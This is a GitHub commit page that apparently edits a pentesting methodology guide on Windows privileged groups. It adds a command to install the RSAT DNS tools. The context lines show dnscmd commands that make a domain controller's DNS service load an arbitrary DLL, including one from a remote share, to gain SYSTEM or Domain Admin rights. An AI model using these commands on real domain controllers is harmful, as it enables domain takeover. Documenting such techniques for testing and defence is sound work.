Skip to content

Commit ef441b6

Browse files
committed
f
1 parent fbad2ae commit ef441b6

1 file changed

Lines changed: 3 additions & 0 deletions

File tree

src/windows-hardening/active-directory-methodology/privileged-groups-and-token-privileges.md

Lines changed: 3 additions & 0 deletions
Original file line numberDiff line numberDiff line change
@@ -172,6 +172,9 @@ Members can make the DNS server load an arbitrary DLL (either locally or from a
172172
dnscmd [dc.computername] /config /serverlevelplugindll c:\path\to\DNSAdmin-DLL.dll
173173
dnscmd [dc.computername] /config /serverlevelplugindll \\1.2.3.4\share\DNSAdmin-DLL.dll
174174
An attacker could modify the DLL to add a user to the Domain Admins group or execute other commands with SYSTEM privileges. Example DLL modification and msfvenom usage:
175+
176+
# If dnscmd is not installed run from aprivileged PowerShell session:
177+
Install-WindowsFeature -Name RSAT-DNS-Server -IncludeManagementTools
175178
```
176179

177180
```c

0 commit comments

Comments
 (0)